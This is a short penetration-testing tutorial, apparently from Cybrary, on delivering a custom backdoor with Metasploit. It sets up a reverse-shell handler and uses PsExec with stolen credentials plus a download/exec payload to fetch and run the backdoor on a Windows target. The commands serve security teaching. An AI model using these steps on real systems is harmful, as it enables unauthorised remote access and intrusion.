Payload Customization with Metasploit
- Setup website from which the victim can download your custom Trojan/Backdoor.
- Setup a Metasploit handler to receive the connection from your custom backdoor.
- Create an exploit to deliver your custom payload.
“set payload windows/meterpreter/reverse_tcp”
If it is a command prompt then you would type
“set payload windows/shell/reverse_tcp”My Python backdoor sends a command prompt, so I'll use:
“windows/shell/reverse_tcp”This “single” payload doesn’t use a stagger and expect a connection from a shell. Do not confuse this with the “windows/shell_reverse_tcp” since “windows/shell_reverse_tcp” which expects a connection from a stagger, not a shell.For better understanding, check my write-ups on: https://www.cybrary.it/0p3n/metasploit-advanced/https://www.cybrary.it/0p3n/metasploit-advanced-part-ii/https://www.cybrary.it/0p3n/metasploit-advanced-part-iii/ Let's continue...Setting lhost to 127.0.0.1, set your lport like 80 - as my payload is set to send a command prompt to port 80. Start multi-handler as a background task. You can use “-j” options that will start the multi-handler as a “job” that runs in the background. 3 - Exploit and deliver the payloadWith your handler in the background waiting to receive a connection, you’re ready to exploit the target. I’ll use PSEXEC.Initially, I use “windows/smb/psexec” and set it up with the correct user and password for the target. Then, I set my payload “set PAYLOAD download/exec”The options are simple. You set the URL to point to the custom payload on you web server in step 1. You can change the name of the file that will be saved to the target if you like. Finally, type “exploit” and you'll see it download from your website. A shell will appear in your handler. Please Note: For those who want greater understating on PSEXEC, I'll cover this in my next write-up.Stay Linked!!!Ali Tabish